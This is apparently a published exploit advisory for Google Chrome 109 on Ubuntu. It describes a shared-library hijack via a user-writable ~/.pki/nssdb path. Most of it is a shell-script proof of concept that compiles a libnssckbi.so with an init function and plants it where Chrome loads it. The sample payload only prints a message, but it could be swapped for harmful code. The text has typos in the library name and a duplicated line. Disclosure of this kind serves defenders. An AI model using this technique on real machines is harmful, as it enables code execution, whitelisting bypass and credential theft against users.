#Exploit Title: Google Chrome 109.0.5414.74 - Code Execution via missing lib file (Ubuntu)
Product: Google Chrome
Discovered by: Rafay Baloch and Muhammad Samak
#Version: 109.0.5414.74
#Impact: Moderate
#Company: Cyber Citadel
#Website: https://www.cybercitadel.com
#Tested-on : Ubuntu 22.04.1
*Description*
Google chrome attempts to load the 'libssckbi.so' file from a user-writable location.
PATH: /home/$username/.pki/nssdb/libnssckbi.so
Since the Shared Library 'ibnssckbi.so' specified path is writeable.
It is possible to achieve the Code Execution by placing the malicious file with
the name `libnssckbi.so` in the specified path.
*exploit*
Following is the POC that could be used to reproduce the issue:
echo "\n\t\t\tGoogle-Chrome Shared Library Code Execution..."
echo "[*] Checking /.pki/nssdb PATH"
if [ -d "/home/haalim/.pki/nssdb" ]
then
echo "[+] Directory Exists..."
if [ -w "/home/haalim/.pki/nssdb" ]
then
echo "[+] Directory is writable..."
echo "[+] Directory is writable..."
echo "[+] Generating malicious File libnssckbi.so ..."
echo "#define _GNU_SOURCE" > /home/haalim/.pki/nssdb/exploit.c
echo "#include <unistd.h>" >> /home/haalim/.pki/nssdb/exploit.c
echo "#include <stdio.h>" >> /home/haalim/.pki/nssdb/exploit.c
echo "#include <stdlib.h>" >> /home/haalim/.pki/nssdb/exploit.c
echo "void f() {" >> /home/haalim/.pki/nssdb/exploit.c
echo 'printf("Code Executed............ TMGM :)\n");' >> /home/haalim/.pki/nssdb/exploit.c
echo "}" >> /home/haalim/.pki/nssdb/exploit.c
gcc -c -Wall -Werror -fpic /home/haalim/.pki/nssdb/exploit.c -o /home/haalim/.pki/nssdb/exploit.o
gcc -shared -o /home/haalim/.pki/nssdb/libnssckbi.so -Wl,-init,f /home/haalim/.pki/nssdb/exploit.o
fi
fi
Upon closing the browser windows, the application executes the malicious code
*Impact*
The attacker can use this behavior to bypass the application whitelisting rules.
This behavior can also lead to DoS attacks.
An attacker can trick a victim into supplying credentials by creating a fake prompt.